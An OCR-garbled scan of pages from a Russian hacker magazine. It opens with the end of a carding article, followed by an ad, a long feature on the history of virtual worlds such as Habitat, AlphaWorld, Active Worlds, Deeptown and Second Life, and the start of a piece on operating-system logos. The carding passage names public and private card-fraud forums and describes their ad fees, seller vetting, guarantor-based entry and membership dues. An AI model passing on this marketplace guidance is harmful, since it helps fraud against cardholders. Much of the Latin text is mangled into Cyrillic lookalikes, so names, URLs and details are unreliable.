и ламеров, кардерская элита основывает частные 
форумы, на которые попасть простому смертному 
просто невозможно. 
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[ ги88іа ] Ярким примером публичного русскоязыч- 
ного форума является тѵт.та^аіака.сс. Можно о 
уверенностью сказать, что по количеству участни- 
ков, а следовательно и по информационной насы- 
щенности, он является несомненным лидером. Ес- 
ли потенциальный мембер хочет разместить объяв- 
ление рекламного характера, ему придется сначала 
раскошелиться — объява стоит денег. После того, 
как селлер оплатит определенную сумму в фонд 
форума (на мазафаке это стоит 100 — 150$), предс- 
тоит пройти проверку качества предоставляемых 
услуг. Для этого требуется выдать модераторам оп- 
ределенное количество товара, которое планиру- 
ешь продавать. 

Существует и еще пара популярных русских фо- 
румов — ттт.ІІіесс.зи и ѵ/ѵ/ѵ/.сагсИпдѵ/огШ.пеІ. 
Размещение рекламы стоит примерно столько 
же, как и на мазафаке, но предоставляемые услу- 
ги у тебя так не проверяют. 

Теперь перейдем к частным форумам. Самый изве- 
стный из русскоязычных — тѵт.ѵепсіогзпатемз. 
Для того, чтобы зарегистрироваться, там необходи- 
мо иметь двух поручителей, которые подтвердят, 
что ты не являешься сотрудником спецслужб или ки- 
далой. Членство на этом форуме платное. Чтобы 
состоять там, приходится отстегивать 20$ в месяц. 
Однако эти ограничения имеют и положительную 
сторону — они сосредотачивают на сайте исключи- 
тельно деловую аудиторию. Стоит отметить, что 
рекламировать предоставляемые услуги можно 
бесплатно. 

Сам понимаешь, что кардингом занимаются не 
только русские. Следовательно, существуют и 
иностранные форумы, такие, как и/и/и/.;ааса,сот. 
Грубо говоря, ІААСА — это тот же вендоре, но 
с англоязычными юзерами @ 
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Попробуй 

музыку!! 



ОБОЖАЕШЬ МУЗЫКУ? 

ХОЧЕШЬ СТАТЬ БЛИЖЕ К СВОИМ ЛЮБИМЫМ ЗВЁЗДАМ? 

ХОЧЕШЬ ПОДЕЛИТЬСЯ СВОИМ МНЕНИЕМ? 

ТОГДА ПОЗВОНИ ПО ТЕЛЕФОНУ 



8.800.200.3.999 

Бесплатный звонок для всех включая абонентов МТС, БиЛайн, Мегафон 




ЗАКАЖИ В РЕДАКЦИИ ЭКЗЕМПЛЯР ЖУРНАЛА БЕСПЛАТНО 

8 . 800 . 200 . 3.999 








ЮНИТЫ КРЕАТИФФ КОДИНГ УМІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20МЕ РЕВПУМ НЬЮСЫ 
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ПрѴІБ&Т 



ѵшиысик 



г' &ЮНО моли , аии 
нипротнф... 
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в лабиринтах 
виртуальных миров 

«ХОЧЕТСЯ ЗАКРЫТЬ ГЛАЗА. ЭТО НОРМАЛЬ- 
НО. ЦВЕТНОЙ КАЛЕЙДОСКОП, БЛЕСТКИ, ИСК- 
РЯЩИЙСЯ ЗВЕЗДНЫЙ ВИХРЬ — КРАСИВО. НО 
Я ЗНАЮ, ЧТО СТОИТ ЗА ЭТОЙ КРАСОТОЙ. 
ГЛУБИНА. ЕЕ НАЗЫВАЮТ «ДИП», НО МНЕ КА- 
ЖЕТСЯ, ЧТО ПО-РУССКИ СЛОВО ЗВУЧИТ ПРА- 
ВИЛЬНЕЕ. ЗАМЕНЯЕТ КРАСИВЫЙ ЯРЛЫЧОК 
ПРЕДУПРЕЖДЕНИЕМ. «ГЛУБИНА!» ЗДЕСЬ ВО- 
ДЯТСЯ АКУЛЫ И СПРУТЫ. ЗДЕСЬ ТИХО — 

И ДАВИТ, ДАВИТ, ДАВИТ БЕСКОНЕЧНОЕ 
ПРОСТРАНСТВО, КОТОРОГО НА САМОМ ДЕЛЕ 
НЕТ. В ОБЩЕМ-ТО, ОНА ДОБРАЯ, ГЛУБИНА. 
ПО-СВОЕМУ, КОНЕЧНО. ОНА ПРИНИМАЕТ 
ЛЮБОГО. ЧТОБЫ НЫРНУТЬ, НУЖНО НЕМНО- 
ГО СИЛ. ЧТОБЫ ДОСТИЧЬ ДНА И ВЕРНУТЬСЯ — 
КУДА БОЛЬШЕ. В ПЕРВУЮ ОЧЕРЕДЬ НАДО 
ПОМНИТЬ — ГЛУБИНА МЕРТВА БЕЗ НАС. НА- 
ДО И ВЕРИТЬ В НЕЕ, И НЕ ВЕРИТЬ. ИНАЧЕ 
НАСТАНЕТ ДЕНЬ, КОГДА НЕ УДАСТСЯ ВЫ- 
НЫРНУТЬ» I тіпсіѵѵОгк (тіпсІѵѵОгк@датеІапсі.ги) 

Феномен АсііѵеѴѴогІсІз 



[Мир НаЬіІаІ] В 1985 г., когда самым популяр- 
ным домашним компьютером был Соттобоге 
64, а модем на 1200 бод казался чудом, компания 
ЫсазІІІт Ѳаглез выпустила первый в истории 
графический мультипользовательский виртуаль- 
ный мир НаЬІІаІ. Конечно, до этого уже были 
МІЮ’ы — текстовые игры, где люди могли иссле- 
довать мир и взаимодействовать друг о другом. 



но все они были исключительно 
текстовыми. В НаЬІІаІ управляемые 
людьми персонажи (аваторы) и ок- 
ружение были нарисованы, и игрок 
мог увидеть все, что происходит, на 
экране. Изображения напоминали 
самые первые адвентюры, и графи- 
ка считалась устаревшей даже по 
тем временам. Но мир от Лукаса 
манил не графическими изысками. 
НаЬІІаІ состоял из около 20 тысяч 
локаций. Передвигаясь в четырех 
направлениях (влево, вправо, 
вверх, вниз), и заходя в разные две- 
ри или переулки, ты попадал в дру- 
гие места, где мог встретить новых 
людей. Большинство предметов в 
этом мире являлись статичными, но 
в каждой локации были вещи, кото- 
рыми можно было манипулировать. 
Например, банкоматы давали дос- 
туп к банковскому счету персонажа, 
торговые автоматы позволяли об- 
менивать виртуальные деньги на 
необходимые вещи, которые можно 
передавать другим. 

НаЬІІаІ был малоизвестным проек- 
том, так что количество жителей 




тш.асІіѵешогІсІ5.сот — офи- 
циальный сайт Мт Ѵ/огІсІв 
Ш0ттяжоттипіТу.отд — 
АѴѴ-комьюнити 
Шр://ѵгтІшогкз.сп8реп.огд/ 
(ад — объемный РАО по язы- 
ку ѴВМІ на английском языке 
()ир://\йі\т.аѵісоттипі(у.огд 
/атс/саІепбаг/0705МтІ — 
календарь официальных 
эвентов в мирах АѴѴ 
ШрУ/таиг.іп(о/іпбех.(іІтІ — 
познавательная фан-стра- 
ничка по Асііѵе ШтШз 
Шр://\лпя/ш.І(іеге.сот — по- 
пулярный мир Пете, не ус- 
тупающий Зесопб иіе 
Шр://суЬегІошп.сот — 
старенький, но все еще по- 
пулярный мир СуЬегіошп 
Шр://ас(іѵешогШв.ти/бошп- 
Іоабз/асІіѵеѵ/отШв.ти.ехе — 
браузер для русских миров 
бир://ас(іѵешотШз.ги/боагб 
т.рбр?бШ=ебдеО — рус- 
ский форум по АѴѴ 
и/и/и/.аи/.ш — страничка 
о русских Ас(іѵе ѴѴогІбз. 



этого виртуального мира не превы- 
шало 10 тысяч человек. Компания-разработчик создала виртуальное ок- 
ружение для игроков, но не установила в начале никаких правил. Поэто- 
му жизненные принципы мира НаЬІІаІ устанавливали сами граждане. Не- 
которые настолько пристрастились к своему виртуальному эго, что всту- 
пали в жаркие дискуссии: «Является ли аватар в НаЬІІаІ живым сущест- 
вом, или это всего лишь очередной Рао-тап?». А когда после введения в 
мир оружия, начались ограбления и убийства 
аватаров, случился настоящий переполох с тре- 
бованием убрать стволы из контента. Была да- 
же построена церковь, в которой перевоспиты- 
вали нерадивых преступников. 

Для людей, населявших НаЬІІаІ, наверняка одним 
из самых памятных событий было приобретение 
обычным игроком супероружия гейммастера и 
последствия этого. В первом виртуальном мире 




так выглядел мир 
НаЬІІаІ 






один из первых скриншотов АІрИаѴѴогІсІ 



самым опасным местом 
было логово под назва- 
нием «Смерть и тени», 
перед входом в которое 
находилась табличка: 
«Опасно! Зайдя сюда, 
ты подвергаешь себя 
большому риску». Ло- 
гово представляло со- 
бой большой лабиринт, 
в котором находилась 
пара системных опера- 
торов, вооруженных 



специальным оружием. Их пистолеты убивали любого персонажа с одного 
выстрела (в отличие от обычных пушек, которые могли убить раза с 12-го) и 
скипетрами, позволяющими моментально вылечить любые ранения. Таким 
образом, админы были практически неубиваемы и носились по лабиринту, 
выискивая аваторов игроков и отправляя их на тот свет. Однажды админ за- 
логинился в мир и оказался посреди нескольких игроков, которые тут же ста- 
ли в него палить из всех стволов. Он то ли не успел воспользоваться скипет- 
ром, то ли забыл... в общем, его в итоге прикончили. А упавшее о тела спе- 
циальное оружие подобрал обычный игрок. Владеть таким предметом ему по 
правилам не полагалось, но когда админы потребовали сдать его, парень 
вполне здраво объяснил, что получил вещь честным путем. Тогда админы 



предложили выкупить пушку за 10 тысяч токенов — огромные по меркам 
НаЬІІаІ деньги. Сделка состоялась при сотнях свидетелях и это событие бы- 
ло несколько недель темой номер один для обсуждения среди всех граждан. 
Конечно, графика и возможности НаЬІІаІ были примитивны, но творение 
ЬисазРІІт Ѳатез подало пример для других разработчиков. И несколько 
лет спустя, подобные миры стали появляться один за другим. 

[АІрИаШогІсІ] В 1992 г. Нил Стефенсон написал компьютерную повесть 
«ЗпоѵѵсгазЬ», события которой разворачиваются в виртуальном мире «ІЬе 
Меіаѵегзе», а главным героем является хакер по имени Ніго Ргоіадопізі. Ровно 
через 2 года, вдохнов- 
ленный этой книгой, не- 
кий Рон Бритвич создал 
ѴѴеЬѴѴогМ, первый 2.5- 
мерный мир, рассчитан- 
ный на десятки тысяч 
людей и работающий на 
компьютерах компании 
Регедгіпе Зузіетз. Од- 
ним из постоянных жи- 
телей ѴѴеЬѴѴогІсІ стал ос- 
нователь Регедгіпе Крис 
Коул. Идея настолько 
ему понравилась, что он 




I ѴРМІ I 

Асііѵе ѴѴОГІСІ8 работают на основе языка 
ѴВМБ (язык моделирования виртуаль- 
ной реальности). Для путешествия в ми- 
рах нужно скачать специальный ѴВМЬ 
браузер или ѴВМЬплагин для твоей 
оперы или ІЕ, а также файлик с расши- 
рением .ѵѵгі, являющийся собственно од- 
ним из миров. ѴВМЕ — это текстовый 
формат, в котором с помощью тексто- 
вых строк можно обозначить разные 
векторные объекты, задать им форму, 
цвет, размер, выбрать текстуру. В фай- 
ле .ѴѴГІ задано множество таких объек- 
тов, и зайдя в мир, ты увидишь все то. 



что построил его автор. Помимо статич- 
ных объектов, внутри могут быть разные 
скрипты, которые насыщают мир собы- 
тиями. ѴВМЕ — это не язык программи- 
рования типа С-Н-І-, это инструмент для 
описания трехмерных сцен, в этом он 
напоминает НТМЕ. Так как .ѵѵгі — это 
текстовый формат, ты можешь создать 
свой мир в обычном текстовом редакто- 
ре. Многие строители миров, впрочем, 
предпочитают пользоваться специаль- 
ными программами, которые позволяют 
сфокусировать усилия на наполнении 
мира, а не на синтаксисе языка. 

Впервые формат ѴВМЕ 1 .0 появился в 



1994 г. как трехмерная альтернатива 
веб-страницам и ѴѴеЬѴѴогІсІ стал первым 
проектом, в котором он использовался. 

В декабре 1997 г. вышла новая, оптими- 
зированная версия языка ѴВМБ97, кото- 
рый позволил создавать более «живые» 
миры и стал стандартом по сей день. 
Сейчас уже существует новый формат, 
совместимый с ѴВМЬ — ХЗО (ЕхІепвІЫе 
30), включающий быстрый Зб-движок, 
независящий от платформы формат 
файлов, усовершенствованную интегра- 
цию ХМІ. Он более продвинутый и гиб- 
кий, чем ѴРМЕ, но пока еще не получил 
большого распространения. 
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решил оставить свой 
бизнес и вместе с прия- 
телями Дэйвом Г обелом 
и Коулом Ларсеном, 
также работающими в 
компьютерной сфере, 
основать компанию, за- 
нимающуюся разработ- 
кой виртуальных миров. 

Так появилась Кпо\л/- 
Іебде Абѵепіиге ѴѴогІсІз, 
через несколько меся- 
цев переименованная в 
ѴѴогІбз Іпс. К компании 
вскоре присоединились 
Рон Бритвич и другие 
ведущие исследователи в этой области. А первым проектом, стартовавшим в 
стенах КАѴѴ, стал АІрІтаѴѴогМ. 28 июня 1995 г. состоялся официальный релиз 
самой первой версии АІрбаѴѴогІсі. Первым «гражданином» мира стал Брит- 
вич, а уже через несколько часов после запуска, АІрИаѴѴогІсі стали заселят 
другие люди, так или иначе узнавшие о проекте. Окружение теперь было 
псевдотрехмерным, юзеры получили намного большую свободу, чем в том 
же НаЬІІаІ. Граждане мира могли смотреть из глаз своего аватара или в 
перспективе от третьего лица. 

На протяжение следующих месяцев игру дорабатывали и наполняли деся- 
ти сотрудников ѴѴогІсІз Іпс., и к марту 1996 г. число зарегистрированных жи- 
телей достигло 50 тысяч. Теперь люди могли выбрать себе аватора из со- 
лидного списка персонажей (в начале автаров было только двое — мужс- 
кой и женский). Когда АІрИаѴѴогІсі стал по настоящему популярным, компа- 
ния дала юзерам возможность наполнять мир самостоятельно. Можно бы- 
ло послать запрос на приобретение открытой, пустынной местности и, с по- 
мощью встроенного конструктора, соорудить из объектов (стена, окно) 
дом, посадив рядом деревья или даже воздвигнуть самому себе памятник. 
Разработчики АІрИаѴѴогІсі всячески поощряли архитекторов мира и давали 
им новые инструменты для строительства. Самым известным творением в 
1996 стал Шервудский лес, в создании которого принимало участие боль- 
шинство граждан мира. Целью этого эксперимента было сделать в 
АІрИаѴѴогИ место, наиболее приближенное к реальности — с аллеями, 
ручьями, животными и уютными домиками. И, так как для достижения этой 
цели люди работали сообща и постоянно обменивались идеями, это позво- 
лило еще больше сплотить комьюнити внутри. 

8 марта 1996 состоялась первая в виртуальных мирах свадьба персонажей 
^апка и Тотаз. Специально для этого события архитекторы соорудили но- 
вый павильон, дизайнеры создали новые свадебные аваторы, было разос- 
лано кучу приглашений... событие прошло о шиком и размахом. По слухам, 
у него также было продолжение в реале. 

В мае 1996 г. ѴѴогИз Іпс. стала выпускать новые миры, на основе опыта 
АІрІтаѴѴогІсі. Все вместе они получили название Асііѵе ѴѴогМз и были соеди- 
нены друг с другом, так что можно было путешествовать из одного мира в 
другой. Первыми последователями АѴѴ стали СуЬогд МаІІоп, ТеІеРагк и ТИе 
ѴѴІІсІ ѴѴезІ, через пару лет «активных миров» насчитывалось уже сотни. 

[Асііѵе ѴѴогІсІа] В 1997 г. ѴѴогІб Іпс. была куплена компанией Сігсіе о1 РІге 
(потом имя владельца сменится на АсІІѵеѵѵогІсІз.сот, Іпс.) и вскоре после 
этого путешествия по официальным Асііѵе ѴѴогІсІз стали платными. Для 
полноценной виртуальной жизни необходимо внести ежемесячную членс- 
кую плату 7$, в этом случае ты можешь пользоваться всеми возможностя- 
ми, и созданные тобой творения никто не сможет разрушить. Можно также 
зайти в мир как Турист — это бесплатно, но ты не сможешь пользоваться 
многими опциями и если построишь домик, кто угодно может внести в нем 
изменения или пустить под каток. 

Все Асііѵе ѴѴогІсІз соединены системой телепортов. То есть, исследовав 
один мир, можешь перейти в следующий, где познакомишься с новыми 
людьми и интерьерами. На данный момент существуют сотни АѴѴ, от под- 
водных городов и ботанических парков до марсианских ландшафтов и ме- 
гаполисов будущего. В некоторых в любое время можно встретить тысячи 
людей, некоторые пустынны и до конца не исследованы. Самым популяр- 
ным является старый-добрый АІрІтаѴѴогИ, площадь которого больше, чем 
штат Калифорния, а население составляет около 150 тысяч человек. 
Начало каждого путешествия начинается в зоне под названием ѲгоипсІ 
2его. Это место всегда самое оживленное, и здесь запросто можно 
познакомиться с новыми людьми. Хотя для длительного общения о 
конкретным собеседником лучше перебраться куда-нибудь, где поти- 
ше, так как желающих поболтать в 02 много, и экран часто захламлен 
всевозможными фразами. 

Перевалочным пунктом между мирами являются Врата (ТИе Ѳаіе) — не- 
большая зона, из которой можно попасть в большинство существующих 
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картинка, иллюстрирующая 
результат кода в блок-врезке 



виртуальных миров. Здесь также 
можно встретить кучу народа. От- 
личительной особенностью Врат 
является то, что в этой зоне досту- 
пен только один аватар, поэтому 
все жители похожи друг на друга 
как две капли. Быстрое перемеще- 
ние в мирах происходит посред- 
ством машин телепортации, где ты 
можешь ввести координаты и ока- 
заться в нужном месте. Можно, ко- 
нечно, дойти пешком, но это все 
равно, что прогуляться пешком от 
Москвы до Питера. 

Активные миры чем-то напоминают 
ІПС. Люди здесь обычно не бродят 
по всем каналам, а находят то, что 
им по душе, и обосновываются в них 
надолго. В этих мирах они общаются 
с друзьями, проводят разные эвен- 
ты, занимаются строительством. 
Существуют тысячи городов, осно- 
ванных и обустроенных местными 
жителями. 

Если ты привык к миллионам поли- 
гонов на квадратный миллиметр и 
спецэффектам из НаІІ ЕІІе 2, тебя 
вряд ли вдохновит графика совре- 
менных Асііѵе ѴѴогІсІз. Все-таки это 
не преренденные картинки, а мно- 
жество 2.5-мерных объектов, рас- 
ставленных автором и жителями о 
помощью языка ѴПМЕ. Картинки да- 
ют тебе представление об окружаю- 
щем тебя мире, остальное додумает 
твое воображение. К тому же, как и 
в онлайновых играх, главное здесь 
не графика, а общение и взаимо- 
действие людей. 

Общение в активных мирах проис- 
ходит при непосредственной бли- 



зости собеседника. Тебя могут слышать до 50 человек, находящихся поб- 
лизости (имеющих статус «оратор» слышат больше и дальше), фразы, ко- 
торые ты вводишь, появляются на некоторое время над головой твоего 
аватара. Также можно посылать личные сообщения и телеграммы. 
Помимо развлечений, которые народ придумывает себе сам, каждую неде- 
лю происходят официальные эвенты. Например, на июль 2005 г. были зап- 
ланированы вечер взрослой поэзии в мире ОогТаза, детский пейнтбол в 
мире АѴѴТееп, викторина Віпдо в мире ЕІѵапсіог и празднование десятилет- 
него юбилея Асііѵе ѴѴогІсІз в реальном мире, в Бостоне, штат Массачусетс. 
АѴѴ используются не только для развлечения. Многие компании и государ- 
ственные структуры взяли на вооружение ѴПМЕ-технологии для создания 
интерактивной обучающей, рекламной или информационной среды. Там, 
где не справится обычный браузер и плоские ѵѵеЬ-страницы, на помощь 
приходит 30. Например, представь себе онлайн магазин, по которому ты 
можешь пройтись, как по-настоящему, пообщаться о продавцами, выбрать 
о прилавков нужные тебе товары и тут же оплатить их. Конечно, можно это 
сделать и через сайт, но в Активных Мирах процесс покупки становится 
намного увлекательнее. 

Активные миры населяют люди из всех уголков света. Далеко не все они 
говорят по-английски, поэтому существует множество национальных ми- 
ров, где общаются только французы, испанцы, немцы и др. Немало среди 
них и русских миров. 



[Русские 30 миры] Самым известным и популярным русским миром яв- 
ляется Диптаун, созданный по мотивам произведений писателя Сергея 
Лукьяненко. Это самостоятельный мир и ты не сможешь через него по- 
пасть в официальные миры АсІІѵеѵѵогІсІз.сот, зато регистрация тут пол- 
ностью бесплатная, да и люди все свои. 

Те, кто читал трилогию «Лабиринт отражений», смогут найти в виртуальном 
Диптауне знакомые черты. Например, одним из самых популярных мест в 
нем является бар «Три поросенка», а для любителей острых ощущений есть 
«Лабиринт смерти». Помимо этого, мир Диптауна включает в себя: мэрию, 
школу стройки, киностудию, ипподром, стадион, космическую станцию, га- 
лереи, дворцы, пляжи, бары, гипермаркеты, парки, храмы, и многие другие 
достопримечательности, которые можно посетить, и где можно встретить 
жителей. Опытные строители или простые архитекторы-любители участву- 






ют в регулярных конкурсах на лучшую постройку, и экспонаты-призеры ста- 
новятся новой гордостью Диптауна. Хотя свой архитектурный шедевр мож- 
но создать в любое время, достаточно изучить основы строительства (в той 
же школе стройки или почитав документации) и послать запрос Хранителю 
на выделение тебе пустого участка земли. 

Хранители являются ключевыми фигурами в Диптауне, они следят за поряд- 
ком и благоустройством мира. Многие вопросы относительно развития Дип- 
тауна решаются на Совете Хранителей. Остальные, кто прошел регистрацию, 
становятся зарегистрированными жителями мира и могут принимать участие 
в его жизни и пополнении. Самым известным жителем Диптауна является 
Белка. Обычная белка, которая живет в дупле дуба, растущего в самом цент- 
ре города. Так уж сложилось, что местное население полюбило ручную зве- 
рушку и постоянно подкармливает орехами, которые можно в изобилии най- 
ти возле ее жилища. Как и в любом нормальном городе, в Диптауне есть своя 
газета, где ведутся городские хроники и объявляется о будущих эвентах. Мно- 
гие жители не ограничиваются виртуальным общением и проводят встречи в 
реале. Например, в Москве АѴѴ-шные тусовки проводятся каждую пятницу. 
Требования к компьютеру у Диптауна невысокие. Простой пентиум, 64 Мб 
ОЗУ, видяха на 32 метра, винт о гигабайтом свободного места и модем — 
все, что тебе нужно. Правда, при первом заходе клиент начнет окачивать 
объекты мира по мере твоего продвижения. Но все это сохраняется на вин- 
те, и в дальнейшем будет подгружаться с него же. Весь мир со всеми объ- 
ектами в сжатом виде занимает около 100 мегабайт. 

Диптаун не единственный представитель вселенной русских Асііѵе ѴѴогІсІз, 
хотя безусловно является центровым. Есть еще Ксенвард — мир фентези, 
где ты можешь просто гулять по живописным природным ландшафтам, слу- 
шая пение птиц и изучая причудливую растительность. Его жители — хобби- 
ты, феи и другие сказочные существа. До недавнего времени очень популяр- 
ным был мир Калипсо, имеющий игровую направленность, в котором посто- 
янно проводились разные викторины и шоу. В январе этого года Хранители 
ни о того ни о сего закрыли мир, чем вызвали возмущение многих его посто- 
янных жителей. Есть и другие русские миры, о них, а также о других, находя- 
щихся в разработке, ты можешь узнать на сайте \л/\л/\л/.асІіѵеѵ/оМв.ги. 

Пару лет назад стартовал новый проект о названием «Диптаун». По словам авто- 
ров, он будет намного более реалистичным, основанным на новых технологиях, и 
иметь намного больше возможностей, чем Асііѵе ѵѵогИз. О проекте можно почитать 
на официальном сайте тт.сІеерІоѵѵп.огд и, при желании, помочь разработчикам. 

[ЗесопсІ ^ііе] Зесопб Еііе — это виртуальный мир, созданный компанией 
ипбеп ЕаЬ. В отличие от Асііѵе ѴѴогІсІз он не основан на языке ѴНМЕ, и для 
запуска тебе нужен не браузер, а специальный клиент. 

В начале тебе предоставляется выбрать аватара, причем сотрудники 
ипбеп ЕаЬ не делают никаких ограничений. Ты можешь стать супергероем, 
сказочным монстром или персонажем любимого фильма. С помощью 
встроенного конструктора и дополнительных утилит ты можешь сделать се- 
бе абсолютно любую внешность. 

Мир Зесопб Еііе — очень разнообразный. Здесь есть все: живописные озера 
и подземные гроты, ночные клубы и известные музеи, воздушные замки и 
современные небоскребы. Большинство построек были сделаны жителями 
мира с помощью интуитивно понятного конструктора, с большой базой дефо- 
лтных объектов и возможностью добавлять свои. А встроенный скриптовый 
язык позволяет делать не только статичные вещи, но и наделять их жизнью. 
Если это пистолет — он может стрелять, если самолет — летать по воздуху. 
В отличие от Асііѵе ѴѴогІсІз, ЗЕ наделен физикой. Здесь присутствует грави- 
тация, инерция, другие законы и даже погодные условия. 

Жители мира могут встречаться и общаться в любой точке мира, причем, если 
твой друг находится за несколько километров от тебя — ты можешь переместить 
его прямо к себе с помощью системы телепортов. А если он в офлайне — пос- 
лать ему сообщение на емейл или ІМ прямо из игры. Несмотря на то, что мир дос- 
таточно молодой, его жителями являются десятки тысяч людей всех полов, воз- 
растов, национальностей и социальных статусов. Развитие идет очень быстро. 
Конечно, Зесопсі Еііе — продукт коммерческий. Разработкой и поддержкой мира 
занимаются десятки сотрудников Еіпсіеп, а все земли и объекты обрабатываются 
на 200 серверах. Если ты 
решил просто исследо- 
вать мир Зесопб Еііе, 
вполне достаточно один 
раз зарегистрировать ак- 
каунт (стоит это 1 0$) и ты 
станешь полноправным 
жителем. Единственным 
ограничением станет то, 
что ты не сможешь ниче- 
го строить и не сможешь 
принимать участие в раз- 
витии мира. Ты можешь 
также купить участок 




земли и построить на нем дом или какой-нибудь бар, который будут посещать 
другие жители. Владение землей размером 512 квадратных метров стоит 10$ в 
месяц. Можно арендовать земли значительно больших размеров, и даже целые 
острова, но ежемесячная плата будет расти пропорционально твоим запросам. 
Торговая система является важной частью Зесопсі Еііе. Ты можешь поку- 
пать и продавать все что угодно: одежду, драгоценности, технику, ме- 
бель... все, что существует в реальном мире, и даже несуществующие 
вещи, ты можешь создать и толкнуть за местную валюту Еіпбеп-доллары. 
Можно также сдавать в аренду или взимать плату за посещение мест, 
которые входят в твою собственность. А заработанные Еіпсіеп’ы потра- 
тить на расширение своего виртуального бизнеса или обменять на ре- 
альные баксы на одном из специализирующихся в этом сайтов (напри- 
мер: ттѵ/.датіпдорептагкеі.сот). 

Разработчики Зесопсі Еііе не только не запрещают вести реальный 
бизнес за реальные деньги в своем мире. Они всячески это поощря- 
ют. На официальном сайте 1і11р://зесопсІІІ1е.сот говорится, что все, 
что ты построил на своей земле, все, что создал своими руками в ми- 
ре Зесопсі Еііе, является твоей интеллектуальной собственностью, и 
ты можешь распоряжаться ей, как тебе угодно. Компания Еіпсіеп так- 
же регулярно делает денежные премии наиболее успешным предпри- 
нимателям, владения которых посещают большая часть жителей. Так 
что если тебе не удалось основать сеть ресторанов твоего имени в ре- 
але, ты можешь запросто реализовать мечту в виртуальности, и 
иметь о этого приличный доход. 

Если тебя заинтересовал мир Зесопсі Еііе — можешь скачать клиент и 7 
дней погулять по миру бесплатно. Изучить конструктор, пообщаться с мест- 
ным населением, осмотреться. Хотя мало тех, кто однажды вошел в этот 
мир, смог потом отказаться от него. 



[Будущее виртуальных миров] Хотя в ближайшем будущем появления 
дип-программы, описанное в «Лабиринте отражений», не предвидится, мож- 
но уверенно сказать, что грань меж- 
ду виртуальными и реальными мира- 
ми постепенно стирается. Уже сей- 
час миры подобные Зесопсі Еііе име- 
ют неплохую графику, возможности 
аватаров практически не уступают 
возможностям людей в реальном ми- 
ре. Современные технологии и шле- 
мы виртуальной реальности позво- 
ляют добиться потрясающего эф- 
фекта присутствия. Конечно, в глуби- 
не сознания ты понимаешь, что это 
всего лишь виртуальность, но то, что 
происходит вокруг, затягивает тебя 





ЗѴѴ Сііу — крупнейший город во вселенной Асііѵе ѴѴогІсІз 



настолько, что ты забываешь об этом. Пока технологии ѴП с эффектом при- 
сутствия используются в обучающих симуляторах и экспериментальных ап- 
паратах, но будущие виртуальные миры неразрывно о ними связаны. Как и в 
АѴѴ, жители смогут участвовать в развитии и строительстве мира, потому что 
ни одна компания не сможет самостоятельно справиться с наполнением 
большой вселенной. 

Уже сейчас миллионы людей проводят значительную часть жизни в вирту- 
альных мирах и большинство из них считают, что они лучше риаллайфа. 
Можешь мне поверить, это только начало большой миграции людей в вир- 
туальность. Сейчас ты задумываешься о том, стоят ли виртуальные миры 
того, чтобы тратить на них время. В будущем ты будешь думать, стоит ли 
того реальный мир @ 
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Символы 
цифрового века 

у КАЖДОЙ УВАЖАЮЩЕЙ СЕБЯ ОРГАНИЗА- 
ЦИИ И КОМПАНИИ ЕСТЬ СОБСТВЕННЫЕ 
НАЗВАНИЕ И ЛОГОТИП, МАКСИМАЛЬНО ТОЧ- 
НО ПЕРЕДАЮЩИЕ СМЫСЛ ИХ ДЕЯТЕЛЬНО- 
СТИ. ВПРОЧЕМ, ЧАСТО ЭТО ПРОСТО КРАСИ- 
ВЫЕ СИМВОЛЫ, В КОТОРЫХ НЕТ ИДЕИ. ВЫ- 
ШЕСКАЗАННОЕ ОТНОСИТСЯ И К МИРУ ИН- 
ФОРМАЦИОННЫХ ТЕХНОЛОГИЙ. ВСЕ МЫ 
ЗНАЕМ, ЧТО ПИНГВИН ЯВЛЯЕТСЯ ЭМБЛЕ- 
МОЙ ОПЕРАЦИОННОЙ СИСТЕМЫ ЫНЦХ, А 
КОРПОРАЦИЯ, ПРОИЗВОДЯЩАЯ КОМПЬЮТЕ- 
РЫ МАСІМТ08Н, НАЗЫВАЕТСЯ АРРЕЕ. НО 
ПОЧЕМУ ИМЕННО ТАК? ЕСЛИ ХОЧЕШЬ ОБ 
ЭТОМ УЗНАТЬ, НЕ ПЕРЕВОРАЧИВАЙ СТРА- 
НИЦУ I Илья Александров (ОАІпе^ / #ѵуЬогд) 

Пингвин Туке 
и компания 



[операционки] Операционная система — это 
многолетний труд тысяч программистов, мил- 
лионы строк кода, и зачастую очень большие 
деньги. Чтобы проект не постиг провал, важно 
учитывать каждую мелочь, даже эмблему и 
название ОС. Например, у РгееВ80 в качестве 
символа — симпатичный демон по имени Веаз- 
Гіе. Разработчики фряхи не сатанисты, пишу- 
щие оккультные программы, просто оловом ба- 
етоп в английском языке называют доброго 
духа, а иногда и просто энергичного, напори- 
стого человека. А в ипіх-сиотемах баеглоп — 
это технический термин, обозначающий про- 
граммы, выполняющие незаметно в фоне ка- 
кую-то полезную работу. Опять же напращива- 
ется сравнение с невидимым добрым духом. 
Разработчики близкой к Ргее системы — ОрепВЗО, 



в качестве талисмана выбрали шипастую рыбу фугу. Это водоплавающее 
известно тем, что способно раздувать себя до размеров, превосходящих пер- 
воначальный объем раза в три, и тем, что является самой ядовитой рыбой в 
мире. Как понимаешь, плавает рыбка по морским просторам спокойно, и ни- 
кто ее кушать не станет. Вот и пользователь ОрепВЗО выходит в глобальную 
сеть без страха, что его систему кто-нибудь взломает — ОС славится своей 
защищенностью. Люди, делающие самую секурную операционку на планете 
— ребята довольно неординарные. К каждому новому релизу создается спе- 
циальная обложка диска, где ри% (а именно так зовут рыбешку) предстает в 
определенном образе. Например, в виде шерифа о дикого запада, или в ви- 
де волшебника страны ОЗ. Все эти изображения можно найти на ттт.орепЬ- 
зсІ.огд/огсІегз.ЫтІ. 

Следующей по списку идет МеГВЗО. Раньше логотипом этой системы явля- 
лась толпа чертей под знаменем, располагающаяся на груде разбитых мо- 
ниторов и системных блоков. Наверное, создатели ОС стремились запу- 
гать конкурирующие проекты и показать неформальность процесса разра- 
ботки — сложно представить себе коммерческий продукт о подобной эм- 
блемой. Правда, сегодня от символа МеІВЗО остался только флаг, видать, 
повзрослели разработчики, стали ответственней и серьезней... 

Эмблемой операционки для компьютеров Арріе — Мае ОЗ, является улы- 
бающаяся рожица. Как утверждают поклонники маков, они влюбились в 
свою систему, как только увидели этот логотип. Лично я предпочитаю бо- 
лее содержательные изображения, нежели картинки из четырех линий и 
пары точек, но тем не менее отдадим должное дизайнерам Арріе. Такая эм- 
блема должна была показать дружелюбность системы к пользователю, 
простоту в освоении и работе. 

Логотип операционной системы от Міегозой знает весь мир. Это — форточка 
(а не рещетка, как ехидно утверждают многие юниксоиды). Изображена она, 
правда, на подобие флага — своего рода знамя коллектива, символ прогрес- 
